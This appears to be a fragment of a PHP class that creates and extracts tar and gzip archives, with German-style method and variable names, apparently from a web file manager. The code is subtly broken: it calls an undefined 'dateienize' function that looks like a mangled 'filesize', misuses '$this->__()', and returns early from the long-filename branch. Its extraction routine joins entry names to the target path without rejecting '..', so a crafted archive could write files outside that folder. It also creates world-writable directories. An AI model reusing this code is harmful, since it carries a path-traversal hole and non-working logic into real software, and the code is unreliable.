	  function archiv_erstellen($file_list){

	  	  $result = false;
          
	  	  if (file_exists($this->archiv_name) && is_file($this->archiv_name)) 	  $newArchive = false;
         
	  	  else $newArchive = true;

	  	  if ($newArchive){
	  	  	  if (!$this->schreiben_offnen()) return false;

	  	  } else {
	  	  	  if (dateienize($this->archiv_name) == 0)	  return $this->schreiben_offnen();
           
	  	  	  if ($this->ist_gzip) {

	  	  	  	  $this->temp_datei_schliessen();
	  	  	  	  if (!rename($this->archiv_name, $this->archiv_name.'.tmp')){

	  	  	  	  	  $this->fehler[] = __('Cannot rename').' '.$this->archiv_name.__(' to ').$this->archiv_name.'.tmp';

	  	  	  	  	  return false;

	  	  	  	  }

	  	  	  	  $tmpArchive = gzopen($this->archiv_name.'.tmp', 'rb');

	  	  	  	  if (!$tmpArchive){
	  	  	  	  	  $this->fehler[] = $this->archiv_name.'.tmp '.__('is not readable');

	  	  	  	  	  rename($this->archiv_name.'.tmp', $this->archiv_name);

	  	  	  	  	  return false;
	  	  	  	  }

	  	  	  	  if (!$this->schreiben_offnen()){
          
	  	  	  	  	  rename($this->archiv_name.'.tmp', $this->archiv_name);

	  	  	  	  	  return false;

	  	  	  	  }

	  	  	  	  $buffer = gzread($tmpArchive, 512);
       
	  	  	  	  if (!gzeof($tmpArchive)){

	  	  	  	  	  do {
           
	  	  	  	  	  	  $binaryData = pack('a512', $buffer);
	  	  	  	  	  	  $this->block_schreiben($binaryData);
       
	  	  	  	  	  	  $buffer = gzread($tmpArchive, 512);

	  	  	  	  	  }
	  	  	  	  	  while (!gzeof($tmpArchive));

	  	  	  	  }
	  	  	  	  gzclose($tmpArchive);
	  	  	  	  unlink($this->archiv_name.'.tmp');

	  	  	  } else {
	  	  	  	  $this->temporare_datei = fopen($this->archiv_name, 'r+b');

	  	  	  	  if (!$this->temporare_datei)	  return false;
	  	  	  }

	  	  }

	  	  if (isset($file_list) && is_array($file_list)) {
        
	  	  if (count($file_list)>0)

	  	  	  $result = $this->dateien_packen($file_list);

	  	  } else $this->fehler[] = __('No file').__(' to ').__('Archive');
	  	  if (($result)&&(is_resource($this->temporare_datei))){
           
	  	  	  $binaryData = pack('a512', '');
            
	  	  	  $this->block_schreiben($binaryData);

	  	  }
        
	  	  $this->temp_datei_schliessen();

	  	  if ($newArchive && !$result){
       
	  	  $this->temp_datei_schliessen();

	  	  unlink($this->archiv_name);
          
	  	  }
	  	  return $result;

	  }


            
	  function archiv_wiederherstellen($path_share){

	  	  $fileName = $this->archiv_name;
        
	  	  if (!$this->ist_gzip){

	  	  	  if (file_exists($fileName)){

	  	  	  	  if ($fp = fopen($fileName, 'rb')){
       
	  	  	  	  	  $data = fread($fp, 2);
          
	  	  	  	  	  fclose($fp);
            
	  	  	  	  	  if ($data == '\37\213'){

	  	  	  	  	  	  $this->ist_gzip = true;

	  	  	  	  	  }
          
	  	  	  	  }
       
	  	  	  }
        
	  	  	  elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->ist_gzip = true;
         
	  	  } 
           
	  	  $result = true;
	  	  if ($this->ist_gzip) $this->temporare_datei = gzopen($fileName, 'rb');

	  	  else $this->temporare_datei = fopen($fileName, 'rb');
	  	  if (!$this->temporare_datei){

	  	  	  $this->fehler[] = $fileName.' '.__('is not readable');
           
	  	  	  return false;

	  	  }
	  	  $result = $this->undateien_packen($path_share);
	  	  	  $this->temp_datei_schliessen();

	  	  return $result;
         
	  }


	  function fehler_anzeigen	  ($message = '') {

	  	  $Errors = $this->fehler;
	  	  if(count($Errors)>0) {

	  	  if (!empty($message)) $message = ' ('.$message.')';
        
	  	  	  $message = __('Error occurred').$message.': <br/>';

	  	  	  foreach ($Errors as $value)

	  	  	  	  $message .= $value.'<br/>';

	  	  	  return $message;	  
       
	  	  } else return '';
	  	  
          
	  }
	  

	  function dateien_packen($file_array){
        
	  	  $result = true;
	  	  if (!$this->temporare_datei){
         
	  	  	  $this->fehler[] = __('Invalid file descriptor');

	  	  	  return false;
            
	  	  }

	  	  if (!is_array($file_array) || count($file_array)<=0)
         
          return true;
         
	  	  for ($i = 0; $i<count($file_array); $i++){
	  	  	  $filename = $file_array[$i];

	  	  	  if ($filename == $this->archiv_name)

	  	  	  	  continue;
            
	  	  	  if (strlen($filename)<=0)

	  	  	  	  continue;
	  	  	  if (!file_exists($filename)){

	  	  	  	  $this->fehler[] = __('No file').' '.$filename;
        
	  	  	  	  continue;
	  	  	  }
            
	  	  	  if (!$this->temporare_datei){
	  	  	  $this->fehler[] = __('Invalid file descriptor');
	  	  	  return false;

	  	  	  }
	  	  if (strlen($filename)<=0){

	  	  	  $this->fehler[] = __('Filename').' '.__('is incorrect');;
	  	  	  return false;

	  	  }

	  	  $filename = str_replace('\\', '/', $filename);

	  	  $keep_filename = $this->pfad_korrigieren($filename);

	  	  if (is_file($filename)){
	  	  	  if (($file = fopen($filename, 'rb')) == 0){

	  	  	  	  $this->fehler[] = __('Mode ').__('is incorrect');
	  	  	  }
	  	  	  	  if(($this->datei_position == 0)){

	  	  	  	  	  if(!$this->kopfzeile_schreiben($filename, $keep_filename))
	  	  	  	  	  	  return false;
	  	  	  	  }

	  	  	  	  while (($buffer = fread($file, 512)) != ''){

	  	  	  	  	  $binaryData = pack('a512', $buffer);

	  	  	  	  	  $this->block_schreiben($binaryData);
	  	  	  	  }
	  	  	  fclose($file);

	  	  }	  else $this->kopfzeile_schreiben($filename, $keep_filename);
       
	  	  	  if (@is_dir($filename)){
       
	  	  	  	  if (!($handle = opendir($filename))){

	  	  	  	  	  $this->fehler[] = __('Error').': '.__('Directory ').$filename.__('is not readable');

	  	  	  	  	  continue;
	  	  	  	  }

	  	  	  	  while (false !== ($dir = readdir($handle))){
	  	  	  	  	  if ($dir!='.' && $dir!='..'){
	  	  	  	  	  	  $file_array_tmp = array();

	  	  	  	  	  	  if ($filename != '.')
	  	  	  	  	  	  	  $file_array_tmp[] = $filename.'/'.$dir;
	  	  	  	  	  	  else

	  	  	  	  	  	  	  $file_array_tmp[] = $dir;


           
	  	  	  	  	  	  $result = $this->dateien_packen($file_array_tmp);
            
	  	  	  	  	  }

	  	  	  	  }

	  	  	  	  unset($file_array_tmp);
       
	  	  	  	  unset($dir);
	  	  	  	  unset($handle);

	  	  	  }

	  	  }

	  	  return $result;

	  }
           

	  function undateien_packen($path_share){ 

	  	  $path_share = str_replace('\\', '/', $path_share);
	  	  if ($path_share == ''	  || (substr($path_share, 0, 1) != '/' && substr($path_share, 0, 3) != '../' && !strpos($path_share, ':')))	  $path_share = './'.$path_share;
            
	  	  clearstatcache();
           
	  	  while (strlen($binaryData = $this->block_lesen()) != 0){

	  	  	  if (!$this->kopfzeile_lesen($binaryData, $header)) return false;
	  	  	  if ($header['filename'] == '') continue;
            
	  	  	  if ($header['typeflag'] == 'L'){	  	  	  //reading long header

	  	  	  	  $filename = '';
         
	  	  	  	  $decr = floor($header['size']/512);

	  	  	  	  for ($i = 0; $i < $decr; $i++){

	  	  	  	  	  $content = $this->block_lesen();

	  	  	  	  	  $filename .= $content;
	  	  	  	  }

	  	  	  	  if (($laspiece = $header['size'] % 512) != 0){

	  	  	  	  	  $content = $this->block_lesen();
           
	  	  	  	  	  $filename .= substr($content, 0, $laspiece);
         
	  	  	  	  }

	  	  	  	  $binaryData = $this->block_lesen();

	  	  	  	  if (!$this->kopfzeile_lesen($binaryData, $header)) return false;

	  	  	  	  else $header['filename'] = $filename;

	  	  	  	  return true;

	  	  	  }

	  	  	  if (($path_share != './') && ($path_share != '/')){
       
	  	  	  	  while (substr($path_share, -1) == '/') $path_share = substr($path_share, 0, strlen($path_share)-1);

	  	  	  	  if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path_share.$header['filename'];

	  	  	  	  else $header['filename'] = $path_share.'/'.$header['filename'];
	  	  	  }

	  	  	  
	  	  	  if (file_exists($header['filename'])){

	  	  	  	  if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){

	  	  	  	  	  $this->fehler[] =__('File ').$header['filename'].__(' already exists').__(' as folder');

	  	  	  	  	  return false;
       
	  	  	  	  }

	  	  	  	  if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){

	  	  	  	  	  $this->fehler[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
	  	  	  	  	  return false;

	  	  	  	  }
	  	  	  	  if (!is_writeable($header['filename'])){
	  	  	  	  	  $this->fehler[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
        
	  	  	  	  	  return false;

	  	  	  	  }
	  	  	  } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){
           
	  	  	  	  $this->fehler[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
           
	  	  	  	  return false;
	  	  	  }



	  	  	  if ($header['typeflag'] == '5'){

	  	  	  	  if (!file_exists($header['filename']))	  	  {
        
	  	  	  	  	  if (!mkdir($header['filename'], 0777))	  {

	  	  	  	  	  	  
         
	  	  	  	  	  	  $this->fehler[] = __('Cannot create directory').' '.$header['filename'];
	  	  	  	  	  	  return false;
	  	  	  	  	  } 

	  	  	  	  }

	  	  	  } else {
          
	  	  	  	  if (($destination = fopen($header['filename'], 'wb')) == 0) {
         
	  	  	  	  	  $this->fehler[] = __('Cannot write to file').' '.$header['filename'];
	  	  	  	  	  return false;
         
	  	  	  	  } else {

	  	  	  	  	  $decr = floor($header['size']/512);

	  	  	  	  	  for ($i = 0; $i < $decr; $i++) {

	  	  	  	  	  	  $content = $this->block_lesen();
        
	  	  	  	  	  	  fwrite($destination, $content, 512);

	  	  	  	  	  }
          
	  	  	  	  	  if (($header['size'] % 512) != 0) {
       
	  	  	  	  	  	  $content = $this->block_lesen();

	  	  	  	  	  	  fwrite($destination, $content, ($header['size'] % 512));
	  	  	  	  	  }
	  	  	  	  	  fclose($destination);

	  	  	  	  	  touch($header['filename'], $header['time']);

	  	  	  	  }
	  	  	  	  clearstatcache();
	  	  	  	  if (dateienize($header['filename']) != $header['size']) {

	  	  	  	  	  $this->fehler[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');

	  	  	  	  	  return false;
	  	  	  	  }
          
	  	  	  }

	  	  	  if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';

	  	  	  if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';

	  	  	  $this->dirs[] = $file_dir;

	  	  	  $this->dateien[] = $header['filename'];

	  
	  	  }
	  	  return true;

	  }


          
	  function dirCheck($dir){
       
	  	  $parent_dir = dirname($dir);


            
	  	  if ((@is_dir($dir)) or ($dir == ''))

	  	  	  return true;


	  	  if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
          
	  	  	  return false;
            


	  	  if (!mkdir($dir, 0777)){

	  	  	  $this->fehler[] = __('Cannot create directory').' '.$dir;

	  	  	  return false;
       
	  	  }

	  	  return true;
	  }
          

	  function kopfzeile_lesen($binaryData, &$header){

	  	  if (strlen($binaryData)==0){
	  	  	  $header['filename'] = '';
         
	  	  	  return true;
         
	  	  }
        

          
	  	  if (strlen($binaryData) != 512){
	  	  	  $header['filename'] = '';
         
	  	  	  $this->__('Invalid block size').': '.strlen($binaryData);
       
	  	  	  return false;

	  	  }


	  	  $prufsumme = 0;

	  	  for ($i = 0; $i < 148; $i++) $prufsumme+=ord(substr($binaryData, $i, 1));

	  	  for ($i = 148; $i < 156; $i++) $prufsumme += ord(' ');
	  	  for ($i = 156; $i < 512; $i++) $prufsumme+=ord(substr($binaryData, $i, 1));
            


	  	  $unpack_data = unpack('a100filename/a8mode/a8benutzer_id/a8group_id/a12size/a12time/a8prufsumme/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);


          
	  	  $header['prufsumme'] = OctDec(trim($unpack_data['prufsumme']));
         
	  	  if ($header['prufsumme'] != $prufsumme){

	  	  	  $header['filename'] = '';
          
	  	  	  if (($prufsumme == 256) && ($header['prufsumme'] == 0)) 	  return true;

	  	  	  $this->fehler[] = __('Error prufsumme for file ').$unpack_data['filename'];
            
	  	  	  return false;
	  	  }



	  	  if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	  $header['size'] = 0;

	  	  $header['filename'] = trim($unpack_data['filename']);

	  	  $header['mode'] = OctDec(trim($unpack_data['mode']));
           
	  	  $header['benutzer_id'] = OctDec(trim($unpack_data['benutzer_id']));
        
	  	  $header['group_id'] = OctDec(trim($unpack_data['group_id']));
	  	  $header['size'] = OctDec(trim($unpack_data['size']));

	  	  $header['time'] = OctDec(trim($unpack_data['time']));

	  	  return true;

	  }
           

	  function kopfzeile_schreiben($filename, $keep_filename){
	  	  $packF = 'a100a8a8a8a12A12';
           
	  	  $packL = 'a1a100a6a2a32a32a8a8a155a12';
            
	  	  if (strlen($keep_filename)<=0) $keep_filename = $filename;
	  	  $filename_ready = $this->pfad_korrigieren($keep_filename);

          
	  	  if (strlen($filename_ready) > 99){	  	  	  	  	  	  	  //write long header

	  	  $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);

	  	  $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');



        //  Calculate the prufsumme

	  	  $prufsumme = 0;
        
        //  First part of the header

	  	  for ($i = 0; $i < 148; $i++)
	  	  	  $prufsumme += ord(substr($dataFirst, $i, 1));

        //  Ignore the prufsumme value and replace it by ' ' (space)
            
	  	  for ($i = 148; $i < 156; $i++)
       
	  	  	  $prufsumme += ord(' ');
        //  Last part of the header

	  	  for ($i = 156, $j=0; $i < 512; $i++, $j++)
       
	  	  	  $prufsumme += ord(substr($dataLast, $j, 1));

        //  Write the first 148 bytes of the header in the archive

	  	  $this->block_schreiben($dataFirst, 148);

        //  Write the calculated prufsumme
        
	  	  $prufsumme = sprintf('%6s ', DecOct($prufsumme));
	  	  $binaryData = pack('a8', $prufsumme);
	  	  $this->block_schreiben($binaryData, 8);
            
        //  Write the last 356 bytes of the header in the archive
	  	  $this->block_schreiben($dataLast, 356);


	  	  $temporare_dateiname = $this->pfad_korrigieren($filename_ready);



	  	  $i = 0;
        
	  	  	  while (($buffer = substr($temporare_dateiname, (($i++)*512), 512)) != ''){

	  	  	  	  $binaryData = pack('a512', $buffer);

	  	  	  	  $this->block_schreiben($binaryData);
	  	  	  }

	  	  return true;
            
	  	  }

	  	  $file_info = stat($filename);
         
	  	  if (@is_dir($filename)){
	  	  	  $typeflag = '5';
	  	  	  $size = sprintf('%11s ', DecOct(0));
	  	  } else {
          
	  	  	  $typeflag = '';

	  	  	  clearstatcache();
           
	  	  	  $size = sprintf('%11s ', DecOct(dateienize($filename)));
	  	  }
	  	  $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));

	  	  $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
	  	  $prufsumme = 0;

	  	  for ($i = 0; $i < 148; $i++) $prufsumme += ord(substr($dataFirst, $i, 1));
	  	  for ($i = 148; $i < 156; $i++) $prufsumme += ord(' ');

	  	  for ($i = 156, $j = 0; $i < 512; $i++, $j++) $prufsumme += ord(substr($dataLast, $j, 1));

	  	  $this->block_schreiben($dataFirst, 148);
       
	  	  $prufsumme = sprintf('%6s ', DecOct($prufsumme));
	  	  $binaryData = pack('a8', $prufsumme);

	  	  $this->block_schreiben($binaryData, 8);

	  	  $this->block_schreiben($dataLast, 356);
	  	  return true;

	  }

	  function schreiben_offnen(){

	  	  if ($this->ist_gzip)
	  	  	  $this->temporare_datei = gzopen($this->archiv_name, 'wb9f');
	  	  else

	  	  	  $this->temporare_datei = fopen($this->archiv_name, 'wb');
       


	  	  if (!($this->temporare_datei)){

	  	  	  $this->fehler[] = __('Cannot write to file').' '.$this->archiv_name;
            
	  	  	  return false;
       
	  	  }
           
	  	  return true;

	  }


	  function block_lesen(){

	  	  if (is_resource($this->temporare_datei)){

	  	  	  if ($this->ist_gzip)

	  	  	  	  $block = gzread($this->temporare_datei, 512);

	  	  	  else

	  	  	  	  $block = fread($this->temporare_datei, 512);

	  	  } else	  $block = '';


	  	  return $block;
	  }
        


	  function block_schreiben($data, $length = 0){
       
	  	  if (is_resource($this->temporare_datei)){
	  	  
       
	  	  	  if ($length === 0){

	  	  	  	  if ($this->ist_gzip)
           
	  	  	  	  	  gzputs($this->temporare_datei, $data);

	  	  	  	  else
	  	  	  	  	  fputs($this->temporare_datei, $data);
            
	  	  	  } else {

	  	  	  	  if ($this->ist_gzip)
       
	  	  	  	  	  gzputs($this->temporare_datei, $data, $length);
	  	  	  	  else

	  	  	  	  	  fputs($this->temporare_datei, $data, $length);

	  	  	  }

	  	  }

	  }


	  function temp_datei_schliessen(){

	  	  if (is_resource($this->temporare_datei)){

	  	  	  if ($this->ist_gzip)
            
	  	  	  	  gzclose($this->temporare_datei);

	  	  	  else

	  	  	  	  fclose($this->temporare_datei);


	  	  	  $this->temporare_datei = 0;

	  	  }

	  }


	  function pfad_korrigieren($path_share){

	  	  if (strlen($path_share)>0){

	  	  	  $path_share = str_replace('\\', '/', $path_share);
	  	  	  $partPath = explode('/', $path_share);

	  	  	  $els = count($partPath)-1;

	  	  	  for ($i = $els; $i>=0; $i--){
	  	  	  	  if ($partPath[$i] == '.'){
                    //  Ignore this directory

                } elseif ($partPath[$i] == '..'){

                    $i--;

                }
	  	  	  	  elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){

                }	  else
            
	  	  	  	  	  $result = $partPath[$i].($i!=$els ? '/'.$result : '');

	  	  	  }
            
	  	  } else $result = '';
	  	  
	  	  return $result;

	  }
}
?>